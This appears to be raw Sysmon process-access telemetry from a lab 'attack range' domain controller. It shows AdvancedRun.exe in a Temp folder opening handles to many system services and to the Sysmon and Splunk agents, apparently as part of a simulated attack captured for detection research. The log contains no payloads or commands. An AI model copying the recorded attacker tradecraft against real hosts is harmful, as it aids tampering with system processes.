20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.195{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004077148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
